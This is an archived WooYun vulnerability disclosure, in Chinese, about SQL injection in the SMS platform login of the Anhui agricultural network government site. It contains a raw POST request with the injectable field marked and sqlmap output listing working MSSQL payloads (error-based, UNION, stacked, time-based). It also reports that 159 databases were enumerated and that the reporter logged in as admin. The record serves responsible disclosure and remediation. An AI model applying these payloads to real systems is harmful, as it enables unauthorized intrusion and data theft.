乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-20: 细节已通知厂商并且等待厂商处理中 2015-01-22: 厂商已经确认,细节仅向厂商公开 2015-02-01: 细节向核心白帽子及相关领域专家公开 2015-02-11: 细节向普通白帽子公开 2015-02-21: 细节向实习白帽子公开 2015-03-06: 细节向公众公开
安徽农网(http://www.ahnw.gov.cn/)短信平台登陆存在sql注射
http://www.ahnw.gov.cn/nwsms/
存在注入。
抓包。
POST /nwsms/check_user.asp HTTP/1.1Host: www.ahnw.gov.cnProxy-Connection: keep-aliveContent-Length: 54Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.ahnw.gov.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.ahnw.gov.cn/nwsms/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: pgv_pvi=3620698112; ahnw_a1=3; _gscu_36441702=21559889a7v6ia16; ASPSESSIONIDASDCAAQR=LLNEFHLBNINFPPCOJMDIAEIE; Hm_lvt_14b56e9c821143e7ea1b1d0a6aac72b5=1421560469,1421563064,1421566755,1421575818; Hm_lpvt_14b56e9c821143e7ea1b1d0a6aac72b5=1421575818; bg%5Fuser=; name=%C5%A9%CD%F8%B9%DC%C0%ED%D4%B1; UserRight=1%2C2%2C3%2C4%2C0%2C5%2C6; SPID=1; PowerList=%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C34%2C36%2C37%2C1%2C2%2C6%2C40%2C41%2C42%2C44%2C45%2C46%2C47%2C10%2C11%2C12%2C43%2C9%2C3%2C38%2C39%2C999%2C; Smpp=8999; UID=1; Cmpp=8999; userId=adminuserId=*&pwd=1%27&imageField.x=0&imageField.y=0
sqlmap跑一跑
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: userId=' AND 1178=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1178=1178) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'jNqc'='jNqc&pwd='&imageField.x=44&imageField.y=12 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: userId=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(85)+CHAR(73)+CHAR(68)+CHAR(112)+CHAR(71)+CHAR(107)+CHAR(111)+CHAR(99)+CHAR(78)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)-- &pwd='&imageField.x=44&imageField.y=12 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: userId='; WAITFOR DELAY '0:0:5'--&pwd='&imageField.x=44&imageField.y=12 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: userId=' WAITFOR DELAY '0:0:5'--&pwd='&imageField.x=44&imageField.y=12---[19:37:09] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008[19:37:09] [INFO] fetching current usercurrent user: 'ahnw.sms'
[19:38:52] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008[19:38:52] [INFO] fetching database names[19:38:52] [INFO] the SQL query used returns 168 entriesavailable databases [159]:
159个库。账号admin/ahnwj*****u成功登陆。
#1.过滤
危害等级:高
漏洞Rank:11
确认时间:2015-01-22 16:46
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。
暂无